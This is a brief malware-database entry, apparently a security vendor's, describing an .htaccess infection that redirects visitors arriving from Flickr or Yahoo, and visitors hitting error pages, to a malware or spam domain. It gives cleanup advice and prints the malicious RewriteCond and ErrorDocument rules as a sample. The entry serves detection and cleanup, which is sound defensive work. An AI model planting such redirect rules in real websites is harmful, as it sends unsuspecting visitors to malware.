Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam).
Loads malware from:
http://redrt.org.in
And other domains.
Affecting:
Any type of web site (no specific target).
Clean up and details:
Remove offendin code from .htaccess.
Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware sample:
.. RewriteCond %{HTTP_REFERER} .flickr. [NC,OR] RewriteCond %{HTTP_REFERER} .yahoo.$ [NC] RewriteRule .* http://redrt.org.in/in.cgi?4¶meter=0510 [R,L] ErrorDocument 400 http://redrt.org.in/in.cgi?4¶meter=0510 ErrorDocument 401 http://redrt.org.in/in.cgi?4¶meter=0510 ErrorDocument 403 http://redrt.org.in/in.cgi?4¶meter=0510 ErrorDocument 404 http://redrt.org.in/in.cgi?4¶meter=0510